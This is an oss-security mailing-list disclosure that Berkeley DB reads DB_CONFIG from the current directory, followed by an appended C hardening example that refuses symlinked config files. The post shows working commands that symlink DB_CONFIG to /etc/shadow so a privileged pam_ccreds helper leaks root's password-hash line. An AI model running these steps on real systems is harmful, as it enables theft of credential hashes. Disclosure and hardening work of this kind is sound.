Date: Sun, 11 Jun 2017 00:06:13 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Berkeley DB reads DB_CONFIG from cwd

Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.

Here's how to exploit it against pam_ccreds:

$ cat /etc/shadow
cat: /etc/shadow: Permission denied
$ ln -sf /etc/shadow DB_CONFIG
$ /sbin/ccreds_chkpwd moo < /dev/null
BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair

(The above was tested on Debian jessie.)

In the past, nss_db was also exploitable: CVE-2010-0826

[*] More precisely, this seems to happen when you call db_create() with dbenv=NULL; or if you use the dbm_open() function.

-- 
Jakub Wilk
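The consumer-side hardening the post implies, added here as an example that is not part of Jakub's message or of Berkeley DB's own code: a privileged helper that must open a configuration file by relative name should refuse a symlink as the final component and check the file's type, owner and mode before handing it to a parser whose error messages echo file contents. The directory, file name and trusted uid are parameters chosen for this example.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open "name" inside "dir" the way a privileged helper (e.g. a setuid password
 * checker) should open a config file it did not create: O_NOFOLLOW makes a
 * symlink such as DB_CONFIG -> /etc/shadow fail with ELOOP instead of being
 * read, and the opened file must be regular, owned by trusted_uid and not
 * group/world writable (otherwise EPERM). Returns a readable fd or -1/errno. */
int open_trusted_config(const char *dir, const char *name, uid_t trusted_uid)
{
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    int fd = openat(dfd, name, O_RDONLY | O_NOFOLLOW | O_NOCTTY | O_CLOEXEC);
    int saved = errno;
    close(dfd);
    errno = saved;
    if (fd < 0)
        return -1;
    struct stat st;
    int ok = fstat(fd, &st) == 0;
    if (ok && (!S_ISREG(st.st_mode) || st.st_uid != trusted_uid ||
               (st.st_mode & (S_IWGRP | S_IWOTH)) != 0))
        errno = EPERM;          /* wrong type, owner or permissions */
    else if (ok)
        return fd;
    saved = errno;              /* fstat failure or the EPERM set above */
    close(fd);
    errno = saved;
    return -1;
}

int main(void)
{
    int fd = open_trusted_config(".", "DB_CONFIG", getuid()); /* demo in cwd */
    if (fd < 0)
        printf("DB_CONFIG refused: %s\n", strerror(errno));
    else
        printf("DB_CONFIG accepted (fd %d)\n", fd);
    return fd < 0;
}
```

Run it in a directory holding a symlink named DB_CONFIG to see the refusal; the same pattern applies to any cwd-relative file a setuid program touches.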